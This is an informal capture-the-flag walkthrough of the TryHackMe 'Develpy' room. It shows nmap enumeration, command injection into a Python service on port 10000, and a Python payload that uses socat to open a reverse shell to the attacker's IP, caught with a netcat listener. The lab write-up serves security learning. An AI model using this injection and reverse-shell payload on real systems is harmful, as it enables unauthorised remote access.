hello guys lets have a simple walkthrough with this medium machine from tryhackme url: https://tryhackme.com/room/bsidesgtdevelpy step 1: enumeration when using rustscan view that there are two open ports , so lets scan for more details with namp **nmap -sC -sV -oN nmap.txt -p22,10000 IP_address**  from the result above we see that port 10000 runs a python.py script which means lets find a way we can get our hands with script i found a way a way we can get our hands on this exploit.py and is as follows nc -nv 10.10.126.22 10000  as you can see if we enter 1, the script it seems as it runs a ping request at the background probably this one will be in /etc/crontab. STEP 2: FOOTHOLDING lets try to check if we can get a command injection here lets test with **;ls**  ended getting an error reverse shell:__import__('os').system('socat TCP:10.8.15.35:1234 EXEC:sh') netcat: nc -nlvp 1234 i got a shell here and remember to stablerize it